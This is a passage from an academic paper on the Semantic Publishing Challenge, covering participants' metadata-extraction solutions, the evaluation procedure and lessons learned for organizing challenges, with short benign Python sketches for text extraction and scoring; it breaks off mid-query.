gazetteers of person first names, e-mail parts, frequent patterns and string comparison, layout information with annie and external repositories, start/end identifiers in plain text, crf with affiliation markers, pos and ner); funding (e.g., ner and sequence classification, or heuristics on the 'acknowledgments' section with regular expressions, grant numbers or identifiers, upper-initial word tokens or organization names, string matching on keywords such as 'support', 'fund' or 'sponsor', or manual jape grammars); references (e.g., crf, geometrical block segmentation, parscit and crossref, hand-crafted rules for multiple cases, heuristics on the 'references' section, external services); ontologies (e.g., matching named entities to indexed ontologies, root tokens of ontology names, stop-lists of acronyms, jape grammars); tables and figures (e.g., max entropy with merge and split, 'table'/'figure'/'fig' trigger words, heuristics on captions and string matching, crf); and supplementary material (e.g., heuristics on links and string matching). in this table, n/a stands for subtasks that were not required in the year the solution participated in the challenge, while an empty cell stands for subtasks that were not addressed by a certain solution.
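several of the funding-related heuristics listed above amount to scanning the 'acknowledgments' section for agency and grant patterns. the following toy python sketch illustrates that style of rule; the patterns and the example text are hypothetical and far simpler than what the actual solutions apply:

    # toy heuristic for spotting funding statements in an 'acknowledgments' section;
    # the patterns and the example text are hypothetical.
    import re

    ACK = ("acknowledgments. this work was partially supported by the example "
           "science foundation under grant no. 123-456 and by the acme project.")

    FUNDING_RE = re.compile(
        r"(?:supported|funded|sponsored)\s+by\s+(?:the\s+)?([a-z][a-z .&-]+?)"
        r"(?=\s+(?:under|and|\.|,))", re.IGNORECASE)
    GRANT_RE = re.compile(r"grant\s+no\.?\s*([\w/-]+)", re.IGNORECASE)

    def extract_funding(text):
        agencies = [m.group(1).strip() for m in FUNDING_RE.finditer(text)]
        grants = GRANT_RE.findall(text)
        return agencies, grants

    print(extract_funding(ACK))   # (['example science foundation'], ['123-456'])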
a final table reports implementation details for the task solutions: for each solution, the implementation language (c++, java or python), the library used for pdf character extraction (apache pdfbox, itext, poppler, pdfminer, pdfx or xpdf), the intermediate representation (html, json, plain text, or xml conforming to nlm jats), the external components used (e.g., the crossref api, dbpedia spotlight, gate, annie, freecite), other components (e.g., grmm, libsvm, mallet, crfsuite, opennlp, parscit, fred, stanford corenlp, nltk, wordnet, babelnet, a dbpedia sparql endpoint, grab spider, beautifulsoup, bibsonomy, fundref, editpad pro, the stanford nertagger, crf++, conll, jats rdf), and the open source license (agpl, lgpl, mit, or not specified).
solution . . kovriguina et al. ( ) relies on a rule-based, pattern-matching approach, implemented in python. some external services are employed for improving the quality of the results (for instance, dblp for validating authors' data), as well as regular expressions, nlp methods and heuristics for html document style and standard bibliographic descriptions. it also relies on an external tool to extract the plain text from pdfs. solution . . ronzano et al. ( ) extended their framework used for task (and indicated as solution . above) to extract data from pdf as well. their linear pipeline includes text processing and entity recognition modules. it employs external services for mining pdf articles and heuristics to validate, refine, sanitize and normalize the data. moreover, linguistic and structural analyses based on chunk-based and sentence-based svm classifiers are employed, as well as enrichment by linking with external resources such as bibsonomy, dbpedia spotlight, dblp, crossref, fundref and freecite. solution . . ahmad, afzal & qadir ( ) proposed a heuristic-based approach that uses a combination of tag-/rule-based and plain-text information extraction techniques combined with generic heuristics and patterns (regular expressions). their approach identifies patterns and rules from integrated formats. solution . . ramesh et al. ( ) proposed a solution based on a sequential three-level conditional random fields (crf) supervised learning approach. their approach follows the same feature list as klampfl & kern ( ). however, they extract pdf to an xml that conforms to the nlm jats dtd, and generate rdf using an xslt transformation tool dedicated to jats. tasks evaluation the evaluation of the submitted solutions was conducted in a transparent and objective way by measuring precision and recall. to perform the evaluation, we relied on (i) a gold standard and (ii) an evaluation tool which was developed to automate the procedure. gold standard. the gold standard used for each task's evaluation was generated manually. it consisted of a set of csv files, each corresponding to the output of one of the queries used for the evaluation. each file was built after checking the original sources (for instance, html proceedings in the case of task and pdf papers for task ) and looking for the output of the corresponding query; then, it was double-checked by the organizers.
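to make this evaluation procedure concrete, the following is a small, illustrative python sketch of how a participant's csv query output can be compared against such a gold-standard csv to obtain precision, recall and f-measure; it is not the actual evaluation tool, and the file names and column layout are hypothetical:

    # illustrative comparison of a submitted query result against a gold-standard csv,
    # reporting precision, recall and f-measure (file names and layout are hypothetical).
    import csv

    def load_rows(path):
        with open(path, newline="", encoding="utf-8") as csv_file:
            return {tuple(cell.strip().lower() for cell in row) for row in csv.reader(csv_file)}

    def score(submitted_path, gold_path):
        submitted, gold = load_rows(submitted_path), load_rows(gold_path)
        true_positives = len(submitted & gold)
        precision = true_positives / len(submitted) if submitted else 0.0
        recall = true_positives / len(gold) if gold else 0.0
        f_measure = (2 * precision * recall / (precision + recall)
                     if precision + recall else 0.0)
        return precision, recall, f_measure

    # example usage: print(score("query01_submitted.csv", "query01_gold.csv"))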
furthermore, we also made the gold standard available to the participants (after their submission) so that they had the chance to report inaccuracies or inconsistencies. the final manually-checked version of the csv files was used as input for the evaluation tool. evaluation tool. the evaluation tool (sempubevaluator, https://github.com/angelobo/sempubevaluator) compares the query output provided by the participants (in csv) against the gold standard and measures precision and recall. it was not made available to the participants after the edition; it was only made available after the edition, while it was already available by the end of the training phase for the edition. this not only increased transparency but also allowed participants to refine their tools and address output imperfections, increasing in this way the quality of their results. best practices for challenge organization in this section we discuss lessons learned from our experience in organizing the challenge and from (even unexpected) aspects that emerged while running it. this section presents the lessons learned by looking at the solutions and data produced by the participants. we have grouped the lessons into categories for clarity, even though there is some overlap between them. moreover, we validated our lessons learned with respect to other semantic web evaluation challenges, aiming to assess whether the lessons learned from the semantic publishing challenge are transferable to their settings too. besides the semantic publishing challenge, another five challenges are organized within the semantic web evaluation challenges track at the eswc semantic web conference (cf. the 'state of the art on previously organized challenges' section). to validate our challenge's lessons learned, we conducted a survey, which we circulated among the organizers of the different semantic web evaluation challenges. one organizer per challenge filled in the questionnaire, providing representative answers for the respective challenge. based on our survey's results, we distill generic best practices that could be applied to similar events. our lessons learned are outlined in this section, together with their validation based on the other challenges, as well as the corresponding distilled best practices. lessons learned from defining tasks for the semantic publishing challenge, it was difficult to define appealing tasks that bridge the gap between building up initial datasets and exploring possibilities for innovative semantic publishing. therefore, as discussed in 'semantic publishing challenge: – ', we refined the challenge's tasks over the years according to the participants' and organizers' feedback. task continuity lesson. in the case of the semantic publishing challenge, the first edition's tasks were well perceived by potential participants and all of them had submissions. in the second edition ( ), in fact, the challenge was re-organized aiming at committing participants to re-submit overall improved versions of their first edition's submissions. results were positive, as the majority of the participants of the first edition competed in the second one too.
therefore, task continuity is a key aspect of the semantic publishing challenge, whose tasks in every year are broadly the same as in the previous year's edition, allowing participants to reuse their tools and adapt them to the new call after some tuning. validation. three of the other four semantic web evaluation challenges have also been organized several times. table shows the sustainability of the challenges considering recency and regularity of revisions over their lifetimes. task continuity was embraced in all challenges by their participants, who not only resubmitted their solutions but also showed continuously improved performance for all three challenges that had multiple editions, according to the organizers' answers to our survey. best practice. tasks should be continued over the course of different editions. nevertheless, they should be adjusted to pose new challenges that allow the authors of previous editions' submissions to participate again in the challenge, thus offering them incentives to improve their solution, without, though, excluding new submissions at the same time. distinct tasks lesson. the initial goal of the semantic publishing challenge was to explore a larger amount of information derived from ceur-ws.org data and to offer a broad spectrum of alternative options for potential participants but, in retrospect, such heterogeneity proved to become a limitation. one of the main problems we faced was that some of the queries classified under the same task were cumbersome for the participants. for instance, in particular the submissions to task (extraction from xml and pdf) showed an unexpectedly low performance. the main reason, in our opinion, is that the task was actually composed of two sub-tasks that required different tools and technologies: some queries required participants to basically map data from xml/pdf to rdf, while the others required additional processing of the content. potential participants were discouraged from participating as they felt competitive for only one of them and not the other. a sharper distinction between tasks would have been more appropriate. in particular, it is important to separate tasks on plain data extraction from those on natural language processing and semantic analysis. validation. according to the results of our survey, the semantic web evaluation challenges were designed with more than one task, more precisely, on average three tasks per challenge. in addition, all the individual tasks of the challenges were defined in relation to each other but independently at the same time, so that participants could take part in all or some of the tasks. nevertheless, only two challenges had submissions for all tasks, while three out of five challenges lacked submissions for only one task. all challenges though, according to our survey, split the tasks considering the required competencies to accomplish them. three out of five challenges even distinguish the training dataset used by each task to render the different tasks even more distinct. this contributes to enabling participation in certain tasks, while more challenging tasks or tasks of a different nature are isolated. thus, participants are not discouraged from participating if they are not competent for these parts; they can still participate in the tasks where they feel competent. best practice.
splitting tasks with a clear and sharp distinction of the competencies required to accomplish them is a key success factor. tasks should be defined taking into consideration the technology, tools and skills required to accomplish them. participants involvement lesson. one of the incentives of the challenge's successive editions was to involve participants in the tasks' definition, because potential tasks or obstacles might be identified more easily, if not intuitively, by them. however, even though we collected feedback from previous years' participants when designing the tasks, we noticed that such a preliminary phase was not given enough attention. even though participants provided feedback immediately after the challenge was completed, they were not equally eager to give feedback when they were asked just before the new edition was launched. talking to participants, in fact, helped us to identify alternative tasks. validation. it is common practice that challenge organizers ask for the participants' feedback. according to our survey, three out of the four challenges (including the semantic publishing challenge) which had more than one submission took the participants' feedback into consideration to adjust the tasks or to define new ones. best practice. exploiting participants' feedback and involving them in the task definition, creating a direct link between different editions, is a key success factor. the participants' early feedback can help to identify practical needs and correspondingly shape and adjust tasks. tasks proposed by or emerging from the community can be turned into an incentive to participate. community traction lesson. although the challenge was open to everyone from industry and academia, we originally expected participants from the semantic web community. however, the submitted solutions include participants with completely different research focus areas, even without any semantic web background. this changed our perception of the core communities in the challenge. in the future, one might therefore consider defining a cross-domain task, e.g., using a dataset of publications from the biomedical domain. validation. evaluating the scientific profiles of participants and the submitted solutions highlights the diversity of professions. the participants of task are mainly active researchers in the fields of nlp (natural language processing), text mining, and information retrieval. submissions to task are mostly from the linked data and semantic publishing communities, addressing various subjects of interest such as user modeling, library science, and artificial intelligence. this diversity of professions was acknowledged while inviting the members of the challenge's program committee, and during the process of assigning them as reviewers to submissions. best practice. defining independent tasks and using datasets related to other fields of study can build a bridge across disciplines. the use case dataset contains data about computer science publications, and the super-event of the semantic publishing challenge series, the eswc conference, is highly ranked, and thus of potential interest to a wide audience, but focused on a dedicated sub-field of computer science. this choice of subject potentially restricts the target audience and the publicity of the challenge; however, with a slight shift of any of these, it becomes possible to involve other research communities.
lessons learned from building training and evaluation datasets the training and output dataset definition are also crucial parts when organizing a challenge. in the semantic publishing challenge case, we experimented with (i) maintaining the same training and output dataset, as well as the same tasks, as in the case of task , and (ii) modifying the dataset but keeping almost the same tasks, as in the case of tasks and . this way, we bridged the gap between building up initial datasets and exploring possibilities for innovative semantic publishing. as mentioned in the 'semantic publishing challenge: – ' section, we refined both the datasets and their corresponding tasks over the years according to the participants' and organizers' feedback. dataset continuity lesson. we noticed benefits of not only continuing the same tasks but also using the same datasets across multiple editions of the challenge. in task of each edition, we evolved training and evaluation datasets based on the same data source over the three years. participants were able to reuse their existing tools and extend the previously created knowledge bases with limited effort. however, for the other tasks, whose datasets were not equally stable, we had to rebuild the competition every year without being able to exploit the past experience. once solutions were submitted for task , though, and it was repeated with the same dataset in as in , the semantic publishing challenge immediately gained a corresponding benefit, as for task : the majority of the submitted solutions were resubmitted. this did not happen with task , which did not gain traction in the first place, and changing the training dataset and tasks did not attract submissions. therefore, the ''continuity'' lesson is equally applicable to tasks as well as to datasets. validation. dataset continuity is not as persistent as task continuity for most challenges, but it still occurs. to be more precise, most challenges in principle reuse the same datasets across different editions: two of the four semantic web evaluation challenges with multiple editions reused the same dataset, while the other two did the same except for one of their editions, where a different dataset was considered, albeit one of the same nature. best practice. the same datasets should be continuously reused over the course of different editions. nevertheless, eventually substituting them with another dataset of the same nature, where the same tasks and tools are equally applicable, does not harm the challenge. single dataset for all tasks lesson. similarly, we observed that it is valuable to use the same dataset for multiple tasks. for instance, in the semantic publishing challenge case, completely different datasets were used for task and task in the first edition, but complementary datasets were used for the same tasks during the second and third editions, while task considered the previous year's output of task . the participants can extend their existing tools to compete for different tasks, with limited effort. this also opens new perspectives for future collaboration: participants' work could be extended and integrated in a shared effort for producing useful data. it is also worth highlighting the importance of such uniformity for the organizers. it reduces the time needed to prepare and validate data, as well as the risk of errors and imperfections.
last but not least, it enables designing interconnected tasks and producing richer output. validation. all four semantic web evaluation challenges with multiple editions used the same dataset or subsets of it for all the different tasks of the challenge. best practice. it is clearly beneficial for the challenge to consider the same dataset for all tasks. exhaustive output dataset description lesson. an aspect that was underestimated in the first editions of the semantic publishing challenge was the training and output dataset description. while we completely listed all data sources, we did not provide enough information on the expected output: we went into detail for the most relevant and critical examples, but we did not provide the exact expected output for all cases in the training dataset. such information should have been provided, as it directly impacts the quality of the submissions and helps participants to refine their tools. validation. according to the survey results, the other semantic web evaluation challenges seem to share the same principle about the exhaustive description of the expected output dataset. to be more precise, only one of the semantic web evaluation challenges does not provide a detailed and exhaustive description of the expected output. best practice. an exhaustive and detailed description of both the training and evaluation datasets is required, as it affects the submissions' quality and helps participants to refine their tools. lessons learned from evaluating results all three editions of the semantic publishing challenge shared the same evaluation procedure (see 'tasks evaluation' for details). however, it presented some weaknesses, especially in the first two editions, which we subsequently addressed. three lessons are derived from the issues that are explained below. entire dataset evaluation lesson. even though we asked participants to run their tools on the entire evaluation dataset, we considered only a subset for the final evaluation. the subset was randomly selected from clusters representing different cases, which participants were required to address. on the one hand, since the subset was representative of these cases, we received a fair indication of each tool's capabilities. on the other hand, some submissions were penalized, as their tool could have worked well on other values which were not taken into account for the evaluation. in the second edition, we tried to resolve this issue by increasing the number of evaluation queries, without reaching the desired results though, and instead causing some additional overhead for the participants. in the third edition, we reduced the number of evaluation queries, but we radically increased their coverage to ensure that the greatest part of the dataset (or even the whole dataset) is covered. validation. our lesson learned was validated by our survey in this case too. only one of the semantic web evaluation challenges does not take the entire dataset into consideration for the evaluation. best practice. the evaluation method should cover the entire evaluation dataset to be fair, to avoid bias and to encourage submissions to maintain a high quality across the entire dataset. disjoint training and evaluation dataset lesson.
during the first two editions of the semantic publishing challenge, the evaluation dataset was a superset of the training one. this may have resulted in some over-training of the tools, and caused imbalance in the evaluation, as certain tools performed very well for the training dataset but not for the entire dataset. in an effort to avoid this, we made the training and evaluation datasets disjoint for the third edition of the semantic publishing challenge. it is more appropriate to use completely disjoint datasets, as a solution to avoid over-trained tools. validation. our lesson learned regarding disjoint training and evaluation datasets was validated by the other challenge organizers. only one of the semantic web evaluation challenges considers an evaluation dataset which is a subset of the training dataset. all the others consider disjoint training and evaluation datasets. best practice. the training and evaluation dataset should be disjoint to avoid over-trained tools. available evaluation tool lesson. the evaluation was totally transparent and all participants received detailed feedback about their scores, together with links to the open source tool used for the final evaluation. however, the timing of its release varied across editions: the evaluation tool was not made available after the first edition, it was only made available after the challenge for the second edition, while it was made available by the end of the training phase for the third edition. it is instead more meaningful to make it available during the training phase, as we did for the challenge's third edition. participants can then refine their tool and improve the overall quality of their output. moreover, such an approach reduces the (negative) impact of output imperfections. though the content under evaluation was normalized and minor differences were not considered as errors, some imperfections were not expected and were not handled in advance. some participants, for instance, produced csv files with columns in a different order or with minor differences in the iri structure. these all could have been avoided if participants had received feedback during the training phase, with the evaluation tool available as a downloadable stand-alone application or as a service. validation. our lesson learned regarding the availability of the evaluation tool was also validated by our survey. to be more precise, all the semantic web evaluation challenges make the evaluation tool available to the challenge participants. there is only one that does not, but only because there is no evaluation tool. (the extraction tool's integration in the ceur-ws.org production workflow is still in progress.) best practice. the evaluation tool should be made available to the participants as early as possible while the participants are still working with the training dataset and fine-tuning their approaches. lessons learned from expected output use and synergies in all three editions of the semantic publishing challenge, the potential use of the expected output was clearly stated in the call, but not the output dataset license; it was up to the participants to choose one. moreover, the challenge was disseminated and supported thanks to synergies with other events.
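to make the role of such an evaluation tool concrete, the python sketch below shows how an evaluator can normalise submitted csv answers (column order, minor iri differences) before scoring them against a gold standard with precision and recall. it is a minimal illustration only, not the tool actually released by the organizers; the file contents, column names and uris are invented.

```python
import csv
import io

def normalise_iri(value: str) -> str:
    # Treat trivial IRI variations (case, trailing slash, stray spaces) as equal.
    return value.strip().rstrip("/").lower()

def load_rows(csv_text: str) -> set:
    # Rows become sets of (column, normalised value) pairs, so column order is irrelevant.
    reader = csv.DictReader(io.StringIO(csv_text))
    return {frozenset((col, normalise_iri(val)) for col, val in row.items()) for row in reader}

gold = load_rows(
    "paper,author\n"
    "http://example.org/paper1,http://example.org/personA\n"
    "http://example.org/paper2,http://example.org/personB\n"
)
# The submission lists the columns in a different order and uses a trailing slash.
submitted = load_rows(
    "author,paper\n"
    "http://example.org/personA/,http://example.org/paper1\n"
    "http://example.org/personC,http://example.org/paper3\n"
)

true_positives = len(gold & submitted)
precision = true_positives / len(submitted) if submitted else 0.0
recall = true_positives / len(gold) if gold else 0.0
print(f"precision={precision:.2f} recall={recall:.2f}")
```

releasing such a script (or exposing it as a service) during the training phase lets participants catch exactly the kind of column-order and iri imperfections described above before the final evaluation.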
in this section, we outline lessons learned regarding how the expected use of the challenge output and synergies reflect on the challenge perspective, also on the participants and their submissions. expected output use lesson. the uppermost goal of the semantic publishing challenge was to obtain the best output dataset. to achieve that, it is required to identify the best performing tool, namely the tool that actually produces the best output dataset. this tool—or a refined version—is subsequently used to generate the rdf representation of the whole ceur-ws.org corpus . the fact that the submitted tools are expected to be reused becomes a critical issue: participants’ submission should not only target the challenge, but they should produce an output that is directly reusable. therefore, it is in fact critical to state how the results of the challenge will be eventually used, in order to encourage and motivate participants. validation. three out of the other four semantic web evaluation challenges do clearly mention the expected output use, as the semantic publishing challenge does too. best practice. the expected output use and conditions should be explicitly specified in advance. license lesson. the incentive to organize the semantic publishing challenge was to reuse the output dataset. thus, having the permission to do so, which is specified through the dataset license, but also to reuse the tool that produces this output to systematically generate the ceur-ws.org dataset, is of crucial importance. particular attention should be given to the licensing of the output produced by the participants. we did not explicitly say which license the submitted solutions should have: we just requested from participants to use an open license on data (at least as permissive as the source of data) and we encouraged open-source licenses on the tools (but not mandatory). most of the participants did not declare which exact license applies to their data. this is an obstacle for its reusability: especially when data come from heterogeneous sources (e.g., paper full texts copyrighted by the individual authors, as well as metadata copyrighted by the workshops’ chairs) and are heterogeneous in content and format, as in the case of ceur-ws.org, it is very important to provide an explicit representation of the licensing information. dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. validation. like the semantic publishing challenge, none of the other semantic web evaluation challenges specified the tool or output dataset license. as a result, none of the submitted solutions provided any licensing information, apart from one challenge where some of the submitted solutions provided licensing information. even though all semantic web evaluation challenges follow the same practice of not specifying the output dataset potential license, it becomes obvious based on the results that explicitly specifying it is important if the challenge output is desired to be reused. best practice. the output dataset license should be explicitly requested to be provided for each one of the submitted solutions. moreover, participants should be advised to re- spectively specify their tools’ licensing information, to enable inference of their potential re- usability. conflicts and synergies lesson. based on our experience from organizing three editions of the semantic publishing challenge, we realized that the dissemination should happen in a targeted way. 
to this extent, other events thematically relevant to the challenge are considered important synergies that contribute to generating interest and identifying potential participants: for instance, in the semantic publishing challenge case the fact that the sepublica workshop on semantic publishing was organized at eswc reflected positively on our challenge, since we had fruitful discussions with its participants. moreover, the fact that results from the first two editions of the semantic publishing challenge (vahdati et al., ) were presented at the save-sd workshop on semantics, analytics, visualization and enhancement of scholarly data (save-sd workshop, http://cs.unibo.it/save-sd/ /), which was co-located with www , contributed to the challenge dissemination’s and in particular to an audience both thematically and technologically relevant to the challenge. to the contrary, in , we introduced a task on interlinking and realized possible conflicts with other challenges, like oaei (ontology alignment evaluation initiative), which may have resulted in the lack of participation to task —even though task did not intend to cover the specialized scope of oaei, but rather put the interlinking task into the scope of a certain use case that merely served in aligning the tasks’ outputs among each other and with other datasets in the lod cloud. therefore, we concluded that it is important not only to generate interest but also to identify and avoid potential conflicts. validation. all semantic web evaluation challenges collaborate with the eswc conference, as they are co-located with this event. besides the main conference, which drives the challenges, it appears that most of them, and in particular the most long-standing ones, also collaborate with other events and, in particular, with other workshops. for instance, the qald challenge collaborates with the clef qa track (http://nlp.uned.es/clef-qa/), and the challenge on semantic sentiment analysis collaborates with the workshop on semantic sentiment analysis (http://www.maurodragoni.com/research/opinionmining/events/), which is also co-organized with eswc. last, the oke challenge collaborates with the linked data for information extraction workshop (ld ie) (ld ie workshop, dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://cs.unibo.it/save-sd/ / http://nlp.uned.es/clef-qa/ http://www.maurodragoni.com/research/opinionmining/events/ http://dx.doi.org/ . /peerj-cs. http://web.informatik.uni-mannheim.de/ld ie /ld ie /overview.html) which, in turn, is co-located with iswc. according to our survey, none of the other challenges experienced conflicts with further challenges. best practice. establish synergies with other events that are thematically and/or technologically relevant to reinforce dissemination and to identify potential participants. challenge solutions analysis in this section, we discuss observations from the participants’ solutions and derive corresponding conclusions that can be used in the linked data publishing domain. we group the lessons into four categories: tools, ontologies, data and evaluation process, even though there is some overlap between these aspects. lessons learned from the tools valuable indications can be derived by looking at the tools implemented by the participants. in particular, we focus on the software used to address tasks and . primary analysis observation. 
the semantic publishing challenge tasks could be addressed by both generic and ad-hoc solutions, as well as different methodologies and approaches; nevertheless, solutions tend to converge. for task , two out of four solutions primarily consisted of a tool developed specifically for this task, whereas the other two solutions only required task-specific templates or rules to be used within their otherwise generic implementations. in the latter case, solution . abstracts the extraction rules from the implementation, whereas solution . keeps them inline with the implementation. those two solutions are generic enough to be adapted even to other domains. even though solutions were methodologically different, four approaches for dealing with the html pages prevailed: (i) structure-based (relying on the html code/structure), (ii) layout-based (relying on the web page layout), (iii) linguistic-based, and (iv) presentation-based. most tools relied on structured-/layout-based approach (three out of four) and only one on a partially linguistic-based approach (solution . ). as far as task is concerned, there were different methodologies and approaches combined in different ways. the overall picture is summarized in tables and . the nature of the task influenced the proposed solutions. in fact the task was composed of two subtasks: (i) identifying the structural components of the pdf papers and (ii) processing the extracted text. thus, some solutions mainly focused on structure-based analysis (five out of eight); others gave more relevance to the linguistic-based analysis (three out of eight) for their primary analysis. last, up to four used the linguistic-based analysis to complement their primary approach, while two solutions also used formatting styles/rules to increase the quality of their output (style-based analysis). we also observed that most solutions implemented a modular pipeline. in particular, the solutions that followed a structure-based analysis had a workflow with a single pipeline, whereas linguistic-based approaches required parallel or iterative pipelines to address dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://web.informatik.uni-mannheim.de/ld ie /ld ie /overview.html http://dx.doi.org/ . /peerj-cs. different aspects of the solution and to increase performance. it is also worth mentioning that two solutions over eight, one being the most innovative solution, adopted an iterative approach. one of them iterates over the same analysis multiple times to refine the results (solution . ); the other one (solution . ) adopted a layered approach, in which each iteration adds new information to the previously-produced output. conclusion. the solutions were methodologically different among each other, and modular and hybrid solutions prevailed compared to case-specific ones. this is important as case- specific solutions do not extend beyond the scope of challenges, but generic ones do. it is interesting to note that both and the best solutions for task relied primarily on structure analysis, whereas the most innovative solutions focused on linguistic analysis. this might indicate that further research on linguistic approaches might bring interesting results for optimizing the output of such tasks. a deep analysis of the structure, in fact, made participants capture more information; on the other hand, these approaches were quite straightforward and less innovative. 
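as an illustration of the structure-based direction described above, the following python sketch extracts workshop metadata from an html fragment using css selectors only, with no linguistic analysis. the markup and class names are simplified, made-up stand-ins loosely inspired by ceur-ws volume pages, not the actual markup any solution had to handle.

```python
from bs4 import BeautifulSoup

# Simplified, invented markup; real index pages are far less regular,
# which is what makes the extraction task hard.
html = """
<ul>
  <li>
    <a class="CEURVOLTITLE" href="http://ceur-ws.org/Vol-0000/">Example Workshop on Semantic Publishing</a>
    <span class="CEURVOLEDITOR">Jane Doe</span>,
    <span class="CEURVOLEDITOR">John Roe</span>
  </li>
</ul>
"""

soup = BeautifulSoup(html, "html.parser")
records = []
for item in soup.select("li"):
    # Structure-based rule: the title is whatever the CEURVOLTITLE anchor contains,
    # regardless of its wording.
    title_link = item.select_one("a.CEURVOLTITLE")
    editors = [e.get_text(strip=True) for e in item.select("span.CEURVOLEDITOR")]
    records.append({
        "volume_url": title_link["href"],
        "title": title_link.get_text(strip=True),
        "editors": editors,
    })

print(records)
```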
it is interesting, though, to note here that the best performing tool of grounded its structured-based approach on a prior linguistic analysis, whereas most solutions grounded their linguistic analysis on a prior structure analysis. thus, hybrid solutions are obviously required but their execution order should not be taken for granted. it is also worth discussing the recall score of the linguistic-based tools: these tools most probably suffer from noisy text extraction. in fact the three solutions (solution . , solution . and solution . ) that mainly rely on linguistic analysis achieved the lowest recall scores both in and editions, even though they showed significant improvement in the latter edition. similarly, the tool that relied on a linguistic analysis for task showed significantly lower precision and recall, compared to the other tools, indicating that linguistic-based solutions are not enough, if not supported by a precise structure analysis. even though the linguistic-based approach was considered a rather innovative way of dealing with task , the evaluation showed that a linguistic-based analysis might not be able to perform as well as a structure-based one. methodologies: extraction, intermediate format and machine learning observation. diverse methodologies were employed by the participants to extract and analyze content. there were no prevalent approaches, but some tendencies were observed. for task , three out of four solutions considered rules to extract data from the html pages; two of them considered css to define the rules, while the other one, which relied on linguistic-based analysis, considered jape; the latter solution was based on crawling. last, all solutions used regular expressions at some point of their workflow. for task , half of the solutions in but only two out of five in extracted the text from pdf documents and turned it into plain text. on the contrary, the majority extracted the text from the pdf files but turned it into xml (two out of six solutions in and four out of five in ). there was only one solution that used html as intermediate format. we noted that, both in and , the best performing solutions relied on dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a pdf-to-xml extraction. moreover, one solution changed from pdf-to-text to pdf- to-xml and indeed performed better in , but we cannot state with high certainty if this was the determining factor. besides extraction, as far as text analysis is concerned, five solutions in and four in relied on supervised machine learning. only two solutions in and one in (the same as in ) additionally relied on unsupervised machine learning to address task . last, all solutions employed heuristics and regular expressions. five out of six solutions in employed natural language processing (nlp) and named entity recognition (ner), and those that also participated in kept nlp/ner in their workflows in . conclusion. solutions based on supervised machine learning were awarded as the most innovative both in and in . therefore, it seems that there is potential on experimenting with supervised machine learning approaches to address such a task. nevertheless, even though the best performing solution in did use supervised machine learning, it is not the case for , which makes us conclude that fundamentally alternative solutions might show good results too. overall, there is potential for improvement and plenty alternative methodologies can be investigated. 
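the supervised machine learning route mentioned above can be illustrated with a toy python sketch that classifies extracted text lines into roles such as title, author or other. the tiny training set, the labels and the model choice are all invented for illustration and are not taken from any submitted solution, which trained on properly annotated data from the training dataset.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Invented, far-too-small training set: lines extracted from papers,
# labelled with the role they play in the document.
train_lines = [
    "A Template-Based Approach to Metadata Extraction",
    "Jane Doe, Example University, Wonderland",
    "Abstract. We present a method for extracting metadata from PDF papers.",
    "Semantic Annotation of Workshop Proceedings",
    "John Roe and Mary Major, Sample Institute",
    "1 Introduction. Scholarly publishing is changing rapidly.",
]
train_labels = ["title", "author", "other", "title", "author", "other"]

# A simple bag-of-words classifier over word uni- and bigrams.
model = make_pipeline(
    TfidfVectorizer(ngram_range=(1, 2)),
    LogisticRegression(max_iter=1000),
)
model.fit(train_lines, train_labels)

for line in ["Deep Analysis of PDF Structure", "Alice Smith, Some University"]:
    print(line, "->", model.predict([line])[0])
```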
the intermediate format used by each solution, on the other hand, had no relevant impact on the final results. source tools observation. the semantic publishing challenge call did not prescribe (i) the implementation language, (ii) the license, as well as whether the tools should (iii) reuse existing components or external services, and (iv) be open-sourced or not. the participants were allowed to follow their preferred approaches. three out of four task solutions, as shown in table , and seven out of eight task solutions, as shown in table , primarily relied on java-based implementations. in both cases, the remaining solution relied on python. two out of eight solutions for task complemented their java-based implementations with python-based parts. moreover, as it is observed in table , for task , three out of four solutions relied on tools totally open-sourced, while the fourth one, the one that addressed both task and task , relied on a stack of tools which are open-sourced, but the workflow used was not. this is also observed in most tools for task , as shown in table (six out of the eight solutions). mit (http://opensource.org/licenses/mit-license.html) was the most popular license, with half solutions for task using it and one out of eight solutions for task , followed by agpl- . (https://www.gnu.org/licenses/agpl- . .en.html), with two out of eight solutions for task using it. last, half of the solutions incorporated external services to accomplish the tasks (two out of four for task and four out of eight for task ). the one of the two solutions for task that used external services was the one that participated both in task and task . gate, dbpedia, crossref api (http://api.crossref.org/), and freecite (http://freecite.library.brown.edu/) are the most used external services. conclusion. open-sourced tools prevailed over closed-sourced ones. none of the participants used a totally closed or proprietary software. most of the them used an dimou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://opensource.org/licenses/mit-license.html https://www.gnu.org/licenses/agpl- . .en.html http://api.crossref.org/ http://freecite.library.brown.edu/) http://dx.doi.org/ . /peerj-cs. open license, and java and python based implementations prevailed both for task and task . the integration of external services was also a valuable solution for the participants. lessons learned from models and ontologies in this section, we discuss the different solutions with respect to the data model, the vocabularies and the way they used them to annotate the data. data model observation. all task solutions tend to converge regarding the data model, identify- ing the same core concepts: conference, workshop, proceedings, papers, and person. a few solutions covered more details, for instance, solution . identified also the concepts of invited papers and proceedings chair, while solution . captured different types of sessions by identifying additionally the concepts of session, keynote session, invited session and poster session, as well as the concepts of organization and topic. in particular for task , solution . domain modeling was inspired by the model used in solution . , with some simplifications, a practice commonly observed in real linked data set modeling. in contrast, task solutions used more heterogeneous data models. there are six high-level properties identified by all solutions: identifier, type, title, authors, affiliation and country. 
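a hypothetical sparql query over such a model shows how these six core properties could be requested uniformly from every submitted dataset. the ex: namespace and the small turtle snippet are invented placeholders, since each solution used its own (real) vocabularies for the same information.

```python
from rdflib import Graph

# Invented placeholder data: one paper carrying the six core properties.
data = """
@prefix ex: <http://example.org/schema#> .
@prefix dcterms: <http://purl.org/dc/terms/> .

<http://example.org/paper1> a ex:Paper ;
    dcterms:identifier "paper1" ;
    dcterms:title "An Example Paper" ;
    ex:author "Jane Doe" ;
    ex:affiliation "Example University" ;
    ex:country "Wonderland" .
"""

g = Graph()
g.parse(data=data, format="turtle")

query = """
PREFIX ex: <http://example.org/schema#>
PREFIX dcterms: <http://purl.org/dc/terms/>
SELECT ?paper ?ident ?title ?author ?affiliation ?country WHERE {
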